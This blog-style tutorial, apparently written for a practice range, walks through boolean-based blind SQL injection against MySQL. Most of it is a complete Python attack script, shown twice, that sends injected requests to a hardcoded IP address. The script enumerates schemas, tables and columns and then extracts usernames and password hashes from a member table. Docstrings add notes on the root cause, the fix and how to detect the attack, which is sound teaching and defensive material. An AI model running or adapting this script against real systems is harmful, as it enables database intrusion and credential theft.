先给大家普及一下
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。
information_schema数据库常用表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的
TABLES表:提供了关于数据库中的表的信息(包括视图)。如show tables from schemaname
COLUMNS表:提供了表中的列信息。如SHOW COLUMNS FROM stormgroup.member
这里找个靶场给大家演示一下
经过
'
and 1=1
and 1=2
确定数据类型为int且存在注入
猜测查询语句为
select * from 数据库.表 where id =可控
查有多少个数据库
def database_number():
    """Count the schemas visible to the injected query (boolean-based blind probe).

    The ``id`` value is followed by an ``AND ORD(MID(...))=ord('<digit>')``
    clause, so the server renders the normal page only when the guessed
    digit equals the first character of ``COUNT(DISTINCT schema_name)``.
    The truth oracle is the marker string '各位平台用户' in the response body.
    Only the digits 0-8 and only the first character of the count are tested.

    Server-side root cause is string concatenation of ``id`` into the SQL
    text; a parameterized query removes the vector.  On the wire this stage
    is a burst of GETs to one endpoint that differ only in the
    INFORMATION_SCHEMA.SCHEMATA clause appended after ``id=1``.
    """
    # The trailing space separates the id value from the injected clause.
    url = "http://219.153.49.228:49005/new_list.php?id=1 "
    for i in range (0,9):
        # IFNULL(..., 0x20) substitutes a space for a NULL result so MID() still yields a character.
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
        r = requests.get(url + payload)
        if '各位平台用户' in r.text:
            print('数据库的数量为:'+str(i))
            break
ord(s) s为字符串 返回s的ascii码
mid(string,start,len)
mid(web,1,1)返回w
ifnull(a,b)不为空返回a 空返回b
count(aaa) 统计aaa的数量
distinct() 去重 假如你有两张一样的表 则返回一张即可
cast(a as b) 将a转换为b型数据
查具体有哪些数据库:
def database_names():
    """Recover up to five schema names, one character at a time.

    For schema index ``h`` (``LIMIT h,1``) and character position ``j``
    (1..17) every candidate in a letters-plus-underscore alphabet is sent as
    an ``ORD(MID(...)) = ord('<c>')`` comparison.  Unlike ``database_number``
    the oracle here is the response length: a body of exactly 801 bytes is
    taken as "true".  Recovered names are printed per schema and joined with
    tabs at the end.

    Detection-wise this is the same endpoint hit with one request per
    candidate character; the requests differ only in the LIMIT/MID offsets
    and the compared character.
    """
    name = ''
    names = ''
    LEN = 0  # never read
    for h in range(0, 5):
        print(h)
        # NOTE(review): indentation was lost in this listing; this loop only
        # re-assigns url and looks like a leftover -- confirm against the original.
        for l in range(1,20):
            url = "http://219.153.49.228:49005/new_list.php?id=1 "
        for j in range(1, 18):
            for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:49005/new_list.php?id=1 "
                payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
                r = requests.get(url + payload2)
                # print(r)
                #print(len(r.text))
                # Length oracle: 801 bytes is the size of the unmodified ("true") page.
                if len(r.text) == 801:
                    name = name + i
                    print(name)
                    #print(type(name))
                    break
        print('database_name:', name)
        names = names + "\t" + name
        name = ''
    print(names)
查当前数据库:
def current_dbs():
    """Recover the first schema name returned by INFORMATION_SCHEMA.SCHEMATA.

    Despite the function name, the probe that is actually sent (``payload2``)
    reads ``schema_name ... LIMIT 0,1``, i.e. the first listed schema, not
    ``database()``.  A ``database()``-based variant (``payload1``) is built
    but never used.  Positions 1..14 are probed; the oracle is the marker
    string '各位平台用户' in the response body.

    Note the target port (47875) differs from the earlier probes; the
    exercise instance appears to have been re-spawned between stages.
    """
    name = ''
    for j in range(1, 15):
        for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
            url = "http://219.153.49.228:47875/new_list.php?id=1 "
            # Built but not sent.
            payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
            payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
            #print(url+'%23')
            r = requests.get(url + payload2)
            #print(r)
            if '各位平台用户' in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)
看stormgroup有多少张表
def tables_number():
    """Count the tables of one schema via INFORMATION_SCHEMA.TABLES.

    The schema is given as the hex literal 0x73746F726D67726F7570
    ('stormgroup').  Counts 1..9 are tried; the length-801 response is the
    "true" oracle.  As in ``database_number`` only the first character of the
    count is compared.
    """
    for j in range(1, 10):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        # ord(%d) without quotes: MySQL converts the integer to a string before ORD().
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
        r = requests.get(url+payload)
        if len(r.text) == 801:
            print('该数据库的表数为:'+str(j))
            break
爆表
def table_name():
    """Recover the names of the first two tables of the 'stormgroup' schema.

    Table index ``i`` selects the row (``LIMIT i,1``), ``h`` the character
    position (1..9), ``j`` the candidate character.  The oracle is a
    response body of exactly 801 bytes.  Each recovered name is printed and
    the tab-joined list is printed at the end.
    """
    name = ''
    names = ''
    for i in range(0, 2):
        for h in range(1,10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                # table_schema is the hex literal for 'stormgroup'.
                payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url+payload)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('table:'+name)
        names = names + "\t" + name
        name = ''
    print('current database have:'+names)
查字段数量
def columns_number():
    """Count the columns of stormgroup.member via INFORMATION_SCHEMA.COLUMNS.

    ``table_name`` and ``table_schema`` are the hex literals for 'member'
    (0x6D656D626572) and 'stormgroup' (0x73746F726D67726F7570).  Counts 1..4
    are tried against the length-801 oracle; there is no ``break``, so all
    four requests are always sent.
    """
    for i in range(1,5):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
        r = requests.get(url + payload)
        #print(r)
        if len(r.text) == 801:
            print('当前表有'+str(i)+'个字段')
列字段
def columns_name():
    """Recover the names of the first three columns of stormgroup.member.

    Same shape as ``table_name``: column index ``i`` (``LIMIT i,1``),
    position ``h`` (1..9), candidate ``j``; the oracle is a 801-byte body.
    Each column name is printed as it completes and the tab-joined list is
    printed at the end.
    """
    name = ''
    names = ''
    for i in range(0, 3):
        for h in range(1, 10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                # Hex literals: 0x6D656D626572 = 'member', 0x73746F726D67726F7570 = 'stormgroup'.
                payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                # print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('columns:' + name)
        names = names + "\t" + name
        name = ''
    print('columns:' + names)
dump数据
def dump():
    """Read the ``name`` and ``password`` columns of stormgroup.member.

    Three rows are read (``ORDER BY name LIMIT i,1``), up to 33 characters
    each, with two GETs per candidate character (one per column).  The
    alphabet adds digits to the one used for metadata.  The oracle is again
    a 801-byte response body.  Neither match breaks out of the alphabet
    loop, so every candidate is always sent for every position.

    This is the stage where the injection becomes data loss.  From the
    server's side it is thousands of near-identical GETs to one URL that
    differ only in the LIMIT/MID offsets and the compared character, which
    is what a request-rate or response-length anomaly rule would surface;
    a parameterized query for ``id`` removes the vector entirely.

    Port 45953 differs from the earlier stages; presumably another
    re-spawned instance of the exercise.
    """
    name = ''
    names = ''
    password = ''
    passwords = ''
    for i in range(0, 3):
        for h in range(1, 34):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
                url = "http://219.153.49.228:45953/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                r1 = requests.get(url + payload1)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    #print(name)
                    # print(type(name))
                if len(r1.text) == 801:
                    password = password + j
                    #print(password)
                    # print(type(name))
        print('username:' + name)
        names = names + "\t" + name
        name = ''
        print('password:' + password)
        passwords = passwords + "\t" + password
        password = ''
    #print('username:' + names)
    print('password:'+ passwords)
md5解密
Capture the flag
全代码如下
__author__ = "星空下de青铜"  # author handle
import requests  # third-party HTTP client; every probe below is a plain GET
def database_number():
    """Count the schemas visible to the injected query (boolean-based blind probe).

    The ``id`` value is followed by an ``AND ORD(MID(...))=ord('<digit>')``
    clause, so the server renders the normal page only when the guessed
    digit equals the first character of ``COUNT(DISTINCT schema_name)``.
    The truth oracle is the marker string '各位平台用户' in the response body.
    Only the digits 0-8 and only the first character of the count are tested.

    Server-side root cause is string concatenation of ``id`` into the SQL
    text; a parameterized query removes the vector.  On the wire this stage
    is a burst of GETs to one endpoint that differ only in the
    INFORMATION_SCHEMA.SCHEMATA clause appended after ``id=1``.
    """
    # The trailing space separates the id value from the injected clause.
    url = "http://219.153.49.228:49005/new_list.php?id=1 "
    for i in range (0,9):
        # IFNULL(..., 0x20) substitutes a space for a NULL result so MID() still yields a character.
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
        r = requests.get(url + payload)
        if '各位平台用户' in r.text:
            print('数据库的数量为:'+str(i))
            break
def database_names():
    """Recover up to five schema names, one character at a time.

    For schema index ``h`` (``LIMIT h,1``) and character position ``j``
    (1..17) every candidate in a letters-plus-underscore alphabet is sent as
    an ``ORD(MID(...)) = ord('<c>')`` comparison.  Unlike ``database_number``
    the oracle here is the response length: a body of exactly 801 bytes is
    taken as "true".  Recovered names are printed per schema and joined with
    tabs at the end.

    Detection-wise this is the same endpoint hit with one request per
    candidate character; the requests differ only in the LIMIT/MID offsets
    and the compared character.
    """
    name = ''
    names = ''
    LEN = 0  # never read
    for h in range(0, 5):
        print(h)
        # NOTE(review): indentation was lost in this listing; this loop only
        # re-assigns url and looks like a leftover -- confirm against the original.
        for l in range(1,20):
            url = "http://219.153.49.228:49005/new_list.php?id=1 "
        for j in range(1, 18):
            for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:49005/new_list.php?id=1 "
                payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
                r = requests.get(url + payload2)
                # print(r)
                #print(len(r.text))
                # Length oracle: 801 bytes is the size of the unmodified ("true") page.
                if len(r.text) == 801:
                    name = name + i
                    print(name)
                    #print(type(name))
                    break
        print('database_name:', name)
        names = names + "\t" + name
        name = ''
    print(names)
def current_dbs():
    """Recover the first schema name returned by INFORMATION_SCHEMA.SCHEMATA.

    Despite the function name, the probe that is actually sent (``payload2``)
    reads ``schema_name ... LIMIT 0,1``, i.e. the first listed schema, not
    ``database()``.  A ``database()``-based variant (``payload1``) is built
    but never used.  Positions 1..14 are probed; the oracle is the marker
    string '各位平台用户' in the response body.

    Note the target port (47875) differs from the earlier probes; the
    exercise instance appears to have been re-spawned between stages.
    """
    name = ''
    for j in range(1, 15):
        for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
            url = "http://219.153.49.228:47875/new_list.php?id=1 "
            # Built but not sent.
            payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
            payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
            #print(url+'%23')
            r = requests.get(url + payload2)
            #print(r)
            if '各位平台用户' in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)
def tables_number():
    """Count the tables of one schema via INFORMATION_SCHEMA.TABLES.

    The schema is given as the hex literal 0x73746F726D67726F7570
    ('stormgroup').  Counts 1..9 are tried; the length-801 response is the
    "true" oracle.  As in ``database_number`` only the first character of the
    count is compared.
    """
    for j in range(1, 10):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        # ord(%d) without quotes: MySQL converts the integer to a string before ORD().
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
        r = requests.get(url+payload)
        if len(r.text) == 801:
            print('该数据库的表数为:'+str(j))
            break
def table_name():
    """Recover the names of the first two tables of the 'stormgroup' schema.

    Table index ``i`` selects the row (``LIMIT i,1``), ``h`` the character
    position (1..9), ``j`` the candidate character.  The oracle is a
    response body of exactly 801 bytes.  Each recovered name is printed and
    the tab-joined list is printed at the end.
    """
    name = ''
    names = ''
    for i in range(0, 2):
        for h in range(1,10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                # table_schema is the hex literal for 'stormgroup'.
                payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url+payload)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('table:'+name)
        names = names + "\t" + name
        name = ''
    print('current database have:'+names)
def columns_number():
    """Count the columns of stormgroup.member via INFORMATION_SCHEMA.COLUMNS.

    ``table_name`` and ``table_schema`` are the hex literals for 'member'
    (0x6D656D626572) and 'stormgroup' (0x73746F726D67726F7570).  Counts 1..4
    are tried against the length-801 oracle; there is no ``break``, so all
    four requests are always sent.
    """
    for i in range(1,5):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
        r = requests.get(url + payload)
        #print(r)
        if len(r.text) == 801:
            print('当前表有'+str(i)+'个字段')
def columns_name():
    """Recover the names of the first three columns of stormgroup.member.

    Same shape as ``table_name``: column index ``i`` (``LIMIT i,1``),
    position ``h`` (1..9), candidate ``j``; the oracle is a 801-byte body.
    Each column name is printed as it completes and the tab-joined list is
    printed at the end.
    """
    name = ''
    names = ''
    for i in range(0, 3):
        for h in range(1, 10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                # Hex literals: 0x6D656D626572 = 'member', 0x73746F726D67726F7570 = 'stormgroup'.
                payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                # print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('columns:' + name)
        names = names + "\t" + name
        name = ''
    print('columns:' + names)
def dump():
    """Read the ``name`` and ``password`` columns of stormgroup.member.

    Three rows are read (``ORDER BY name LIMIT i,1``), up to 33 characters
    each, with two GETs per candidate character (one per column).  The
    alphabet adds digits to the one used for metadata.  The oracle is again
    a 801-byte response body.  Neither match breaks out of the alphabet
    loop, so every candidate is always sent for every position.

    This is the stage where the injection becomes data loss.  From the
    server's side it is thousands of near-identical GETs to one URL that
    differ only in the LIMIT/MID offsets and the compared character, which
    is what a request-rate or response-length anomaly rule would surface;
    a parameterized query for ``id`` removes the vector entirely.

    Port 45953 differs from the earlier stages; presumably another
    re-spawned instance of the exercise.
    """
    name = ''
    names = ''
    password = ''
    passwords = ''
    for i in range(0, 3):
        for h in range(1, 34):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
                url = "http://219.153.49.228:45953/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                r1 = requests.get(url + payload1)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    #print(name)
                    # print(type(name))
                if len(r1.text) == 801:
                    password = password + j
                    #print(password)
                    # print(type(name))
        print('username:' + name)
        names = names + "\t" + name
        name = ''
        print('password:' + password)
        passwords = passwords + "\t" + password
        password = ''
    #print('username:' + names)
    print('password:'+ passwords)
# Script entry: only the final data-read stage is live; it runs at import
# time since there is no ``if __name__ == "__main__"`` guard.  The earlier
# stages are kept commented out in reverse order of use.
dump()
#columns_name()
#columns_number()
#table_name()
#tables_number()
#current_dbs()
#database_names()
#database_number()
结语:小编小菜鸡一个,花了一天才写出来的。里面也没有运用啥算法优化,在dump数据的时候会
很慢,建议运用二分法优化一下
其中查表数量啥的只是为了爆表的时候少循环几次,可以合二为一,把得到的表的数量传参到爆表那里 或者弄个全局变量就ok了
小编实在等不及和大家分享了 后续有啥再和大家一起进步吧 ^_^